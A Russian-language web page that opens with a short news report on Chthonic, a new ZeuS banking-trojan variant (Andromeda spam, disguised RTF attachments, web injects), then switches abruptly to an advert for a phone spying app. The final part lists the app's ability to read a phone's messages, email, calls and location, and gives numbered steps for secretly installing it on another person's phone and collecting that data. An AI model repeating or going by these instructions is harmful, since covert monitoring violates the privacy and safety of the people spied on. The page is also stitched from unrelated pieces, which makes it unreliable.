Обнаружена новая версия трояна ZeuS

dv683075 Новая версия известного трояна ZeuS была обнаружена Лабораторией Касперского, отчёт на данную тему доступен в персональных блогах сотрудников компании. Поскольку во многих банковских системах используется модифицированный вариант Windows, то программа Chthonic становится реальным средством для получения доступа к удалённым системам.

Новая модификация позволяет обходить различные файерволы и сетевые экраны. Если злоумышленник использует такой троян на целевой системе, то появляется возможность воспользоваться административными привилегиями, а затем выполнять различные мошеннические транзакции.

Вредоносный софт способен поразить около 150 различных банковских систем, расположенных в 15 странах планеты. Основными мишенями выбраны банки в странах с высокими доходами населения: США, Германия, Великобритания, Япония, а также на банки из России и Италии. Для рассылки активно используется популярный бот Andromeda, а целевые компьютеры заражаются при помощи специальных эксплоитов. Рассылка подобных писем требует пользовательских действий, поэтому многое определяется внимательностью работников соответствующих банковских структур, а также клиентов банков.

Когда происходила рассылка электронных писем, во вложении всегда присутствовал дополнительный файл RTF документа, код которого мог выполняться в среде Microsoft Word. Поскольку расширение было DOC, подозрения у большинства пользователей это не вызывало. Удалённое выполнение кода всегда несёт в себе потенциальную угрозу, о чём предупреждает и сам MS Office, если производится попытка открытия соответствующего файла. Эксперты не спешат бить тревогу, поскольку аналогичных троянов существует немало.

Активно используется в распространении и web-инъекция, которая позволяет злоумышленнику заменять код страницы на собственный текст, а также на нужные ему изображения. Теоретически это способствует воровству различного рода конфиденциальную информацию, включая пин-коды, пароли, логины, адреса электронных почтовых систем, телефонные номера. Как считают сотрудники Лаборатории Касперского, новая версия ZeuS серьёзно эволюционировала, поскольку она использует бот Andromeda и виртуальную машину ZeuSVM.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.